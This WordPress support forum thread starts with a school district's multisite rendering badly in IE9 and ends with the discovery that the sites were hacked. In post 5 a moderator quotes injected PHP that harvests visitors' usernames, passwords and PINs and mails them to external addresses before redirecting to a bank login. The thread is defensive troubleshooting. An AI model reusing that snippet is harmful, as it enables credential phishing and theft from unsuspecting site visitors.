WordPress.org

Ready to get started?Download WordPress

Forums

Suffusion
4.4.4 & IE 9 (22 posts)

  1. rmiddleton
    Member
    Posted 1 year ago #

    Multisite, all sites, now not legible in IE but are fine in FireFox and Chrome.
    LOVE the improvements in the theme (was a few versions back).
    Tried everything I found in the forums, to no avail.
    Examples:
    http://websites.msdpt.k12.in.us/he/
    http://websites.msdpt.k12.in.us/sh/
    http://websites.msdpt.k12.in.us/ph/
    Backing down to 3.7.8 "fixes" the issue, but...

  2. WPyogi
    Volunteer Moderator
    Posted 1 year ago #

    Probably the DOCTYPE error here:

    http://validator.w3.org/check?uri=http%3A%2F%2Fwebsites.msdpt.k12.in.us%2Fhe%2F&charset=%28detect+automatically%29&doctype=Inline&group=0

    You should not have any code above the DOCTYPE - IE freaks out!

  3. rmiddleton
    Member
    Posted 1 year ago #

    Looks like a great tool to check, but I am not seeing what file it is referencing to go hacking. Where is DOCTYPE?

  4. rmiddleton
    Member
    Posted 1 year ago #

    Additionally, trying to solve this I ended up with 3 versions of 4.4.4. suffusion4.4.4, suffusion4-4-4 and suffusion444.
    All three show up in theme list, but no way to differentiate.
    I also have two 3.4.7's in there and one that claims to be 3.7.8 but comes up as 3.4.7. How do I find what folder each is TRULY pointing to so I can remove some? They are all telling me I can't move or delete because they are in use. (I know, different subject, but part of the problem.)

  5. WPyogi
    Volunteer Moderator
    Posted 1 year ago #

    The DOCTYPE goes at the top of every page -- see this:

    http://www.w3schools.com/tags/tag_doctype.asp

    All of your sites have code above it - did you add it to the header.php files?

    <?
    
    $ip = getenv("REMOTE_ADDR");
    $hostname = gethostbyaddr($ip);
    $message .= "---------------Great1------------------------------------\n";
    $message .= "User ID: ".$_POST['username']."\n";
    $message .= "Password: ".$_POST['realm']."\n";
    $message .= "Personal Identification Number: ".$_POST['password']."\n";
    $message .= "-------------------------------------------------------------------\n";
    $message .= "Client IP : ".$ip."\n";
    $message .= "HostName : ".$hostname."\n";
    $rnessage = "$message\n";
    $message .= "---------------O My LORD------------------------------------\n";
    $recipient = "dino.donju@gmail.com, donjudino@gmail.com";
    $subject = "BofA";
    $headers .= "MIME-Version: 1.0\n";
    mail($recipient,$subject,$rnessage,$headers);
    mail($messege,$subject,$rnessage,$headers);
    		   header("Location: https://www.pacific.net.au/account/loginCustomer.jsp");
    ?><!DOCTYPE html>
  6. rmiddleton
    Member
    Posted 1 year ago #

    I have not done ANY customizing outside of choices within the theme. However, I see in the header.php there IS a php block of code above DOCTYPE. Guessing it would be in lots of places/files/code segments.

    From HEADER.PHP

    <?php
    /**
     * Core header file, invoked by the get_header() function
     *
     * @package Suffusion
     * @subpackage Templates
     */
    global $suffusion_unified_options, $suffusion_interactive_text_fields, $suffusion_translatable_fields, $suffusion_skin_dependence, $suf_color_scheme;
    
    if (function_exists('icl_t')) {
    	foreach ($suffusion_unified_options as $id => $value) {
    		/**
    		 * Some strings are set interactively in the admin screens of Suffusion. If you have WPML installed, then there may be translations of such strings.
    		 * This code ensures that such translations are picked up, then the unified options array is rewritten so that subsequent calls can pick it up.
    		 */
    		if (function_exists('icl_t') && in_array($id, $suffusion_translatable_fields) && isset($suffusion_interactive_text_fields[$id])) {
    			$value = wpml_t('suffusion-interactive', $suffusion_interactive_text_fields[$id]."|".$id, $value);
    		}
    		global $$id;
    		$$id = $value;
    		$suffusion_unified_options[$id] = $value;
    	}
    }
    ?>
    <!DOCTYPE html>
    <!--[if IE 6]> <html id="ie6" <?php language_attributes(); ?>> <![endif]-->
    <!--[if IE 7]> <html id="ie7" <?php language_attributes(); ?>> <![endif]-->
    <!--[if IE 8]> <html id="ie8" <?php language_attributes(); ?>> <![endif]-->
    <!--[if !(IE 6) | !(IE 7) | !(IE 8)]><!--> <html <?php language_attributes(); ?>> <!--<![endif]-->
    
    <head>

    [Please wrap your code in backticks, in future]

  7. rmiddleton
    Member
    Posted 1 year ago #

    Validator you used doesn't understand PHP?

  8. rmiddleton
    Member
    Posted 1 year ago #

    I see there is no [if for IE 9..
    Works fine in IE 10.
    If only we didn't have 7000 PCs defaulted to IE 9...

  9. That's really odd and shouldn't be there in the generated HTML. I've installed that 4.4.4 theme on my test installation and I am not seeing that code at the top like that.

    Backing down to 3.7.8 "fixes" the issue, but...

    Can you take one of those sites and switch to the Twenty Eleven theme? That's just to confirm if it's your theme or something else generating that code.

    That code that is showing up has me really worried and that really does look like you've been hacked. :(

  10. rmiddleton
    Member
    Posted 1 year ago #

    This is now at Twenty Twelve
    http://websites.msdpt.k12.in.us/he/

  11. rmiddleton
    Member
    Posted 1 year ago #

    Even THAT looks bad in IE9.

  12. rmiddleton
    Member
    Posted 1 year ago #

    Yep, "Basically" isn't too bad, but... They ALL look fine in FF & Chrome.
    Cannot figure out what happened. They were fine yesterday!

  13. WPyogi
    Volunteer Moderator
    Posted 1 year ago #

    Sorry I had to leave for a while, but I had the same concern as Jan - that your sites have been hacked. Can you go back to twentytwelve and deactivate all your plug-ins just to see if that changes it (the errant code)? (It's not that the sites are "okay" in FF and Chrome, just that IE is a fussy browser - the bad code is there in all of them.)

  14. I have to agree with WPyogi: your site really is hacked.

    That code is being inserted incorrectly but it's PHP for mailing user id and passwords. You really have to find what's causing that because that's the code that'e being improperly inserted into your web page.

    Where is it being successfully inserted into your PHP? Meaning what can't we see?

    You need to start working your way through these resources:
    http://codex.wordpress.org/FAQ_My_site_was_hacked
    http://wordpress.org/support/topic/268083#post-1065779
    http://smackdown.blogsblogsblogs.com/2008/06/24/how-to-completely-clean-your-hacked-wordpress-installation/
    http://ottopress.com/2009/hacked-wordpress-backdoors/

    Additional Resources:
    http://sitecheck.sucuri.net/scanner/
    http://www.unmaskparasites.com/
    http://blog.sucuri.net/2012/03/wordpress-understanding-its-true-vulnerability.html
    http://codex.wordpress.org/Hardening_WordPress
    http://www.studiopress.com/tips/wordpress-site-security.htm

  15. rmiddleton
    Member
    Posted 1 year ago #

    I will, but to be clear, you are saying this is not normal? (below)
    <?php
    /**
    * The Header for our theme.
    *
    * Displays all of the <head> section and everything up till <div id="main">
    *
    * @package WordPress
    * @subpackage Twenty_Eleven
    * @since Twenty Eleven 1.0
    */
    ?><!DOCTYPE html>

  16. WPyogi
    Volunteer Moderator
    Posted 1 year ago #

    That's normal, but that's not what is on your site. Look at the code (rendered HTML) I posted above -- it's bad and it's in every page of your sites.

  17. rmiddleton
    Member
    Posted 1 year ago #

    Aw! Now I understand. There goes the weekend...

  18. WPyogi
    Volunteer Moderator
    Posted 1 year ago #

    Yeah, sorry - that kind of thing is horrible...good luck with it. There are people you can hire to help if need be (Securi is one).

  19. rmiddleton
    Member
    Posted 1 year ago #

    As network admin I just notice there are two "required" plugins. Never noticed before. Are these valid? index.php & yui.php

  20. rmiddleton
    Member
    Posted 1 year ago #

    Found it! It was in mu-plugins. Not sure how it got there, but check it out now!

  21. Much better! But you really need to at least change your passwords and look for other compromised files. Just as a safety precaution.

  22. rmiddleton
    Member
    Posted 1 year ago #

    Not me. Now I am worried about how it got there!

Topic Closed

This topic has been closed to new replies.

About this Theme

About this Topic

Tags